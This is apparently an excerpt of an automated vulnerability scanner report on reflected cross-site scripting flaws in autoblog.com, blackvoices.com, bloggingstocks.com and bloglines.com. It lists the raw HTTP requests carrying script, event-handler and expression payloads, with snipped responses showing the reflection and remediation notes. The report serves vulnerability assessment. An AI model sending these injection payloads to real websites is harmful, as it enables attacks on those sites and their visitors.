GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?65d60"><script>alert(1)</script>1b28de94597=1"/> ...[SNIP]...
1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed8f"-alert(1)-"d7b205f65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/?2ed8f"-alert(1)-"d7b205f65a=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc04"><a>1436766e6d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.autoblog.com/2011/02/06acc04"><a>1436766e6d8/mahindra-tr40-pickup-only-good-for-19-21-mpg/"/> ...[SNIP]...
1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d613"-alert(1)-"fe97bb80e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... ternalFilters="javascript:,autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?5d613"-alert(1)-"fe97bb80e97=1"; s_265.prop16="Mahindra TR40 pickup only good for 19/21 mpg? — Autoblog"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="8"; s_265.prop2 ...[SNIP]...
1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3db4"><script>alert(1)</script>c2ac64e6519 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/?b3db4"><script>alert(1)</script>c2ac64e6519=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895 was submitted in the REST URL parameter 3. This input was echoed as f7b24"><x style=x:expression(alert(1))>ee21d362895 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /2011/02/06f7b24"><x%20style%3dx%3aexpression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="referer" value="http://www.autoblog.com:1080/2011/02/06f7b24"><x style=x:expression(alert(1))>ee21d362895/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/"> ...[SNIP]...
1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44a06"-alert(1)-"c678d512fbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... lters="javascript:,autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?44a06"-alert(1)-"c678d512fbe=1"; s_265.prop16="Williams FW33 Formula 1 car unveiled, IPO confirmed — Autoblog"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="8"; s_265 ...[SNIP]...
1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ee"><script>alert(1)</script>325abb71f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/?5b9ee"><script>alert(1)</script>325abb71f59=1 HTTP/1.1 Host: www.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 200d9"-alert(1)-"24b08b883ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life-style200d9"-alert(1)-"24b08b883ad/black-travel HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3240378380.1628589389.2600273152; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:16:07 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 30969 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm04 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="life-style200d9"-alert(1)-"24b08b883ad"; s_265.prop2="black-travel"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/life-style200d9\"-alert(1)-\"24b08b883ad/black-travel"; s_265.linkInternalFilters=" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0d24"-alert(1)-"b7bf6e6c1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /life-style/black-travelb0d24"-alert(1)-"b7bf6e6c1a HTTP/1.1 Host: www.blackvoices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.1997950285.3749250816; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:16:11 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 30965 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <!-- s_265.mmxgo=true; s_265.pageName="Page Not Found"; s_265.channel="us.bv"; s_265.trackExternalLinks="true"; s_265.prop1="life-style"; s_265.prop2="black-travelb0d24"-alert(1)-"b7bf6e6c1a"; s_265.pfxID="bkv"; s_265.disablepihost=false; s_265.prop12="http://www.blackvoices.com/life-style/black-travelb0d24\"-alert(1)-\"b7bf6e6c1a"; s_265.linkInternalFilters="javascript:,aol.com,blackvoic ...[SNIP]...
1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f020e"-alert(1)-"014356e96ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f020e"-alert(1)-"014356e96ab=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218f9"><script>alert(1)</script>7dcb406a603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?218f9"><script>alert(1)</script>7dcb406a603=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0 was submitted in the REST URL parameter 2. This input was echoed as 898c0"><img src=a onerror=alert(1)>608c32bafe0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/stocks-to-buy898c0"><img%20src%3da%20onerror%3dalert(1)>608c32bafe0/ HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy898c0\" ...[SNIP]... <meta name="description" content="Posts from the Stocks to buy898c0"><img src=a onerror=alert(1)>608c32bafe0 Category at BloggingStocks" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98487"-alert(1)-"2967d4b5373 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-buy98487"-alert(1)-"2967d4b5373/ HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy98487\" ...[SNIP]...
1.256. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/category/stocks-to-buy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6441"><script>alert(1)</script>46a3decaefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/stocks-to-buy/?c6441"><script>alert(1)</script>46a3decaefc=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Buy -- Blo ...[SNIP]... <link rel="canonical" href="http://www.bloggingstocks.com/category/stocks-to-buy/?c6441"><script>alert(1)</script>46a3decaefc=1"/> ...[SNIP]...
1.257. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/category/stocks-to-buy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ac1"-alert(1)-"351873993a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-buy/?a2ac1"-alert(1)-"351873993a2=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a596"><img%20src%3da%20onerror%3dalert(1)>458e833042a was submitted in the REST URL parameter 2. This input was echoed as 4a596"><img src=a onerror=alert(1)>458e833042a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/stocks-to-sell4a596"><img%20src%3da%20onerror%3dalert(1)>458e833042a/ HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell4a596\ ...[SNIP]... <meta name="description" content="Posts from the Stocks to sell4a596"><img src=a onerror=alert(1)>458e833042a Category at BloggingStocks" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c328"-alert(1)-"236b3348c2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-sell1c328"-alert(1)-"236b3348c2b/ HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell1c328\ ...[SNIP]... s_265.linkInternalFilters="javascript:,bloggingstocks.com"; s_265.mmxgo = true; s_265.prop1="BloggingStocks"; s_265.prop2="Category"; s_265.prop12="http://www.bloggingstocks.com/category/stocks-to-sell1c328"-alert(1)-"236b3348c2b/"; s_265.prop16="Stocks To Sell1c328\\\" Alert(1) \\\"236b3348c2b -- BloggingStocks"; s_265.prop18="stocks-to-sell1c328\"-alert(1)-\"236b3348c2b"; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t ...[SNIP]...
1.260. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/category/stocks-to-sell/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e7b9"-alert(1)-"56855ea8d31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/stocks-to-sell/?5e7b9"-alert(1)-"56855ea8d31=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Stocks To Sell -- Bl ...[SNIP]... 265.linkInternalFilters="javascript:,bloggingstocks.com"; s_265.mmxgo = true; s_265.prop1="BloggingStocks"; s_265.prop2="Category"; s_265.prop12="http://www.bloggingstocks.com/category/stocks-to-sell/?5e7b9"-alert(1)-"56855ea8d31=1"; s_265.prop16="Stocks To Sell -- BloggingStocks"; s_265.prop18="stocks-to-sell"; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.261. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloggingstocks.com
Path:
/category/stocks-to-sell/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27143"><script>alert(1)</script>62c906a11a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/stocks-to-sell/?27143"><script>alert(1)</script>62c906a11a1=1 HTTP/1.1 Host: www.bloggingstocks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db567<script>alert(1)</script>8ff1ceb380a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__db567<script>alert(1)</script>8ff1ceb380a HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6779 Connection: close Date: Sun, 06 Feb 2011 20:16:19 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <p>Click here to subscribe to __FEED__db567<script>alert(1)</script>8ff1ceb380a</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a75ea--><script>alert(1)</script>002cc05c041 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sub/__FEED__a75ea--><script>alert(1)</script>002cc05c041 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6788 Connection: close Date: Sun, 06 Feb 2011 20:16:21 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <input type="hidden" name="url" value="__FEED__a75ea--><script>alert(1)</script>002cc05c041" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24e6"><script>alert(1)</script>05cab84ecba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__c24e6"><script>alert(1)</script>05cab84ecba HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6785 Connection: close Date: Sun, 06 Feb 2011 20:16:19 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=__FEED__c24e6"><script>alert(1)</script>05cab84ecba"> ...[SNIP]...
1.265. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67a15<script>alert(1)</script>befbf2a3d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__?67a15<script>alert(1)</script>befbf2a3d6b=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6788 Connection: close Date: Sun, 06 Feb 2011 20:16:17 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <p>Click here to subscribe to __FEED__?67a15<script>alert(1)</script>befbf2a3d6b=1</p> ...[SNIP]...
1.266. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cadb6"><script>alert(1)</script>e4f23ab92f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sub/__FEED__?cadb6"><script>alert(1)</script>e4f23ab92f5=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6794 Connection: close Date: Sun, 06 Feb 2011 20:16:16 GMT Server: lighttpd/1.4.26
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Bl ...[SNIP]... <form method="post" action="http://dashboard.bloglines.com/subscribe.php?url=__FEED__?cadb6"><script>alert(1)</script>e4f23ab92f5=1"> ...[SNIP]...
1.267. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bloglines.com
Path:
/sub/__FEED__
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8e7a9--><script>alert(1)</script>d0fb6fba531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sub/__FEED__?8e7a9--><script>alert(1)</script>d0fb6fba531=1 HTTP/1.1 Host: www.bloglines.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Content-Length: 6797 Connection: close Date: Sun, 06 Feb 2011 20:16:18 GMT Server: lighttpd/1.4.26
